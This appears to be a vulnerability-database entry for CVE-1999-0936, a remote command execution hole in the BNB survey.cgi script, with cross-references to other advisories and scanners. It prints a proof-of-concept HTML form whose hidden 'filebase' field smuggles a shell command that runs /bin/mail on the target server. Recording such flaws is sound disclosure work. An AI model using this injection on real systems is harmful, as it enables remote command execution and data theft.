BNB Survey.cgi脚本远程执行任意命令漏洞

🗓️ 25 Oct 2008 00:00:00Reported by RootType

BNB Survey.cgi remote command execution vulnerabilit

Reporter	Title	Published	Views	Family All 7
CVE	CVE-1999-0936	4 Jan 200005:00	–	cve
Cvelist	CVE-1999-0936	4 Jan 200005:00	–	cvelist
Tenable Nessus	Multiple Dangerous CGI Script Detection	17 Jun 200300:00	–	nessus
EUVD	EUVD-1999-0917	7 Oct 202500:30	–	euvd
NVD	CVE-1999-0936	3 Dec 199805:00	–	nvd
OpenVAS	Detection of various dangerous CGI scripts (HTTP) - Active Check	3 Nov 200500:00	–	openvas
Positive Technologies	PT-1998-1119 · Bnb · Bnbsurvey	3 Dec 199800:00	–	ptsecurity


                                                &lt;FORM METHOD= POST  ACTION= www.victim.com/cgi-bin/survey.cgi &gt;

    &lt;input type=hidden name=action value= VOTE &gt;

    &lt;input type=hidden name=filebase value= bleh; /bin/mail you@your_email_address.com

    &lt;PRE&gt;

    Your Gender

    &lt;input type=radio name=ITEM1 value= 0 &gt;Male

    &lt;input type=radio name=ITEM1 value= 1 &gt;Female

    &lt;input type=radio name=ITEM1 value= 2 &gt;Neuter

    &lt;INPUT TYPE= submit  VALUE= VOTE! &gt;

25 Oct 2008 00:00Current

6.8Medium risk

Vulners AI Score6.8

EPSS0.0178